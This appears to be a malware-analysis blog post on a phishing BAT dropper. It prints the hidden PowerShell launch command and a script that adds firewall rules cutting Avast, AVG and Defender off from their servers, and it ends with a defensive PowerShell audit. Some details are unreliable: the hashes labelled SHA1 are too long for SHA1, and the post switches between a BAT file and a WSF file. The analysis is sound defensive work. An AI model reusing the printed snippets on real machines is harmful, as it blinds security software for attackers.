What is avast antivirus executable
Yesterday, I found an interesting sample that I started to analyze… It reached my spam trap attached to an email in Portuguese with the subject: "Venho por meio desta solicitar orçamento dos produtos" ("I hereby request the products budget"). There was one attached ZIP archive: PanilhaOrcamento.zip (SHA1: 3c159f65ba88bb208df30822d2a88b6531e4d0a7) with a VT score of 0/58. Inside the archive, a simple BAT file: "Panilha Orcamento Contabil 32f5.bat" (SHA1: c191821ddb1db46349afdb08789312ce418696d1), which was unknown on VT.

The BAT file launches a hidden PowerShell process:

    %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command Start-Process '"%bmh%"'

A payload is downloaded from hXXps://77org/p2r.php? (note that a valid SSL certificate is used) and two files are created:

    C:\rx hsdj\o\i\x\ffax bnzx\fvenotify.exe (SHA1: 6d28d5453d0c2ca132ba3b3d7f0a121427090c1eb52f7d2a5c3e4e5440411bc7)
    C:\rx hsdj\o\i\x\ffax bnzx\secur32.dll (SHA1: 2ee0c761a25310e34c9d3c9d3e810192d8bbd10d4051522e3eefdc1bd71a17bb)

The file fvenotify.exe is reported clean on VT and is signed by Avast as their SafeZone Browser. When I re-executed the WSF file, the name changed to "ftp.exe". But the suspicious PE file generates a new PowerShell script in %TEMP% and executes it. It modifies the current Windows firewall rules to prevent some antivirus products from "phoning home":

    $fw = New-Object -ComObject hnetcfg.fwpolicy2
    $rule = New-Object -ComObject HNetCfg.FWRule

    If ($appName -ne $null)

    Add-FirewallRule "3txqSDF2" "%ProgramFiles%\AVAST Software\Avast\avastui.exe"
    Add-FirewallRule "Ytb7kY9a" "%ProgramFiles%\AVAST Software\Avast\AvastSvc.exe"
    Add-FirewallRule "xgmQL8Wb" "%ProgramFiles%\AVAST Software\Avast\setup\instup.exe"
    Add-FirewallRule "ABZBkNHB" "%ProgramFiles(x86)%\AVG\Antivirus\avgui.exe"
    Add-FirewallRule "eLGeMJyw" "%ProgramFiles(x86)%\AVG\Antivirus\AVGSvc.exe"
    Add-FirewallRule "9LEY6ZsT" "%ProgramFiles(x86)%\AVG\Antivirus\setup\instup.exe"
    Add-FirewallRule "uNUG4JaK" "%ProgramFiles%\Windows Defender\MpCmdRun.exe"
    Add-FirewallRule "d9mjBtLt" "%ProgramFiles%\Windows Defender\MSASCui.exe"

    Remove-Item $MyInvocation.MyCommand.Definition

The PE file fvenotify.exe is added to the Run registry for persistence. I'll check the PE file more deeply, but did you already detect the same behaviour? Please share!
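As an added example (not code from the original analysis), the read-only PowerShell audit below uses the same HNetCfg.FwPolicy2 COM interface the script abused to list outbound block rules pinned to the security-product binaries named above, and dumps Run-key entries for review. The binary list is taken from the quoted Add-FirewallRule calls; the two Run-key paths are the standard locations and are an assumption, since the analysis does not say which hive was used.

```powershell
# Added example, not part of the original diary: audit firewall rules and Run keys
# for the tampering pattern described above (outbound block rules on AV executables).
$watchedBinaries = @(
    'avastui.exe', 'AvastSvc.exe', 'instup.exe',   # Avast (from the quoted script)
    'avgui.exe', 'AVGSvc.exe',                      # AVG
    'MpCmdRun.exe', 'MSASCui.exe'                   # Windows Defender
)

function Get-SuspiciousFirewallRules {
    # Same COM interface the malicious script used, but only enumerating here.
    $fw = New-Object -ComObject HNetCfg.FwPolicy2
    foreach ($rule in $fw.Rules) {
        # NET_FW_RULE_DIR_OUT = 2, NET_FW_ACTION_BLOCK = 0; ignore rules without a program path.
        if ($rule.Direction -ne 2 -or $rule.Action -ne 0 -or -not $rule.ApplicationName) { continue }
        $exe = [System.IO.Path]::GetFileName($rule.ApplicationName)
        if ($watchedBinaries -contains $exe) {
            [pscustomobject]@{
                Name        = $rule.Name            # the sample used random 8-character names
                Application = $rule.ApplicationName
                Enabled     = $rule.Enabled
            }
        }
    }
}

function Get-RunKeyEntries {
    # Assumed persistence locations; review any value pointing at an unfamiliar path.
    $paths = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    foreach ($p in $paths) {
        if (-not (Test-Path $p)) { continue }
        $props = Get-ItemProperty -Path $p
        foreach ($name in $props.PSObject.Properties.Name) {
            if ($name -like 'PS*') { continue }   # skip registry-provider metadata properties
            [pscustomobject]@{ Hive = $p; Name = $name; Command = $props.$name }
        }
    }
}

Get-SuspiciousFirewallRules | Format-Table -AutoSize
Get-RunKeyEntries | Format-Table -AutoSize
```

Run from an elevated prompt so HKLM and all firewall rules are visible; an empty first table means no block rule currently targets the listed binaries.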